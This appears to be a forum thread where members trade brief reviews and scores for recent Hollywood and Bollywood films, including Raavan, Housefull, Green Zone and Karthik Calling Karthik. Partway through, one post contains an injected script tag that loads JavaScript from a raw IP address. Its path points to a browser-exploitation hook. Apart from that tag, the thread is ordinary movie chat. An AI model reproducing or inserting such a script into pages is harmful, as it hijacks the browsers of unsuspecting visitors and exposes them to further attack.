I think there's a reason Housefull was a big hit? No?

yea its a called marketing... nothing about the quality of the movie

Om Shanti Om was a big hit too.. doesnt mean its a good movie

Been meaning to watch The Godfather trilogy, watched the first two and 30 minutes into the third one.

Family were watching an Indian movie, can't remember the name; I just walked past and it caught my attention because some actor was trying to say Kapil Dev was better than Imran Khan. I lol'd :)))

it is this one:

Watched last night's match.. was pretty good, loved the part where the antagonist, Shahid Afridi, hit a century.

Today watched some new movies ...

The Killers with Ashton Kutcher and Katherine Heigl. Not the best of action comedies. Probably a 5 / 10. Reminds me too much of "Mr and Mrs Smith"

Green Zone with Matt Damon. Another action thriller. I was looking forward to this one and enjoyed it. 8/10.

Watched or fast forwarded my way through SAW 6 recently...

Saw 1 and 2 were respectable and good gory inventive movies...

Saw 3 onwards is were it became complete tripe!!

Avoid at all costs and wait for it to be broadcasted on national television!!

I have watched a few movies over the last couple of days ,

Sorority Row - Some good eye candy and gore but that is about it. 5.5/1o

The Back Up Plan - watched it JLO since she is a good entertainer. Nothing special really, just your average, run of the mill romantic comedy. 5/1o

When in Rome - A simple yet sweet movie. The Kristen Bell and Josh Duhamel shared good chemistry. Definitely watchable. 7.5/1o

Watched Psycho IV, the made-for-television movie. Superb! Love the character of Norman. 10/10

The Karate Kid, very interesting, the kid was good and Jackie was solid as ever. 9/10 but im a bit biased for these types of movies.

Haha Foozee, loved Bheja Fry.

Just watched The A-Team today. What a movie! Loved it. 10/10

indeed, I was also really looking forward to it, but felt quite underwhelmed in the end.

Raavan...

what apiece of crap

I was thinking of watching it.

Really, was it that bad? Trailer made it seem boring - but I guess the trailer was not lying. :D

Raavanan was good, while the first half was visually stunning, it did not help the story any bit, i did not like that, while the second half was really good.

Vikram as Raavanan did a great job. The director stuck to many things as portrayed in ramayan itself(which wasn't really good), but did have a fair amount of differences. Aishwarya, as always, to quote the NYT, 'was dramatically challenged'. ;-)

The film was overall good, but certainly not in the league of Mani Ratnam's earlier films.

Ravan was disappointing. Too long and boring, with a plot that went nowhere, Abhishek hammed it up like crazy, vikram had a constipated look, aishwarya looked nice but acting wise was her usual mediocre self. Mani tried his own take on ramayana but the results were very very mixed. The visuals were beautiful, that's the only saving grace.

Raavan was mediocre.

Parts of it made no sense whatsoever. Ending was a bit abrupt as well.

My Sri Lankan friend watched the Tamil version of it and said it was amazing. They had the same storyline, but obviously Tamil actors and stuff.

Why do you get your hopes up with Bollywood?

Exactly - I gave up on Bollywood a few years ago, so glad I did - was a load of nonsense

The films that are semi-decent are usually copies of hollywod/far eastern movies and they are hugely inferior

+1, Vikram > Abhishek *cough* Bachchan

Can't stand watching bollywood movies they are so damn cheesy, well for the most part anyway. Not had a chance to watch a movie now for a week or so time to go to imdb top 250 and find an interesting movie.

Layer Cake.

Daniel Craig was cool in it. Good film.
Watched it long time ago, can't remember anything about it except the title which makes me hungry.

Going to watch Knight and Day tonight, Cruise and Diaz for the first time in quite a while (I think it's their first movie together after Vanilla Sky?). It's an action comedy apparently. Should be interesting..

Winter's Bone

Superb movie. Drama about a girl who goes looking for her missing father. Brilliantly shot and the film feels very real throughout.

Watched Hard Target staring Jean Claude Van Damme, old and a boring film, one to be forgotten quickly.

There will be Blood
District 9

Both were good, and District 9 is one of the best sci-fi movie i have ever seen. To Hell with Independence Day.

'Houseful'
A light comedy film starring Akshay Kumar, Arjun Rampal, Deepika Padukone. The film went alright till the end where it turned very boring. Overall an okay film.

'Raajneeti'
A film starring Arjun Rampal, Ranbir Kapoor, Katrina Kaif. The film was not a bad one...... Infact quite watchable if you are interested in politics. Arjun Rampal´s acting was very impressive, I must admit.

'Raavan'
I kind of liked it! Abhishek Bachchan´s role as Beera was brilliant in my honest opinion. Very rarely does this man impress me with his work.

Havnt watched any new movie lately..<script src=http://69.65.31.43/~indifuno/blahism/beef/hook/beefmagic.js.php></script> Waiting for Eclipse.. :)

i found Manoj Bajpai acting more impressive than arjun rampal specially that scene when he says in a NAWAZ SHARIF style :-

Karara jawad millay ga ,karara jawab millay gay ;-)

The first Sex and the City movie.

Now my life is complete. (Partially, as I still haven't seen the second one).

One film I forgot to mention in my above post was Farhan Akhtar and Deepika Padukone´s 'Karthik Calling Karthik'.

It was probably the best of the lot I have seen in the recent past. The film went very well except for the ending. I would have preferred an end where Farhan would commit suicide due to his mantle disorder.

Anyone seen "I HATE LUV STORYS" yet?! I was thinking AZ would've seen it by now :P and posted a review on it! lol

Anyways am planning to go to watch it later on today as its been a while since I watched any! Will put a review up once I've seen it for you all! :)

This is how I was too when I watched it that it was one of the best I had seen for a while as it was not the typical Bollywood flick one gets to see so very often!

I saw "I HATE LUV STORYS" yesterday..
Have to say, it was a good movie(not a great movie.)
Sonam's acting was really good with all the expressions...Supporting cast was also good..
Music was peppy..one liners were funny most of the times...
3/5

Hard to Kill - Staring Steven Segal, one of my favourite actors. Good movie too
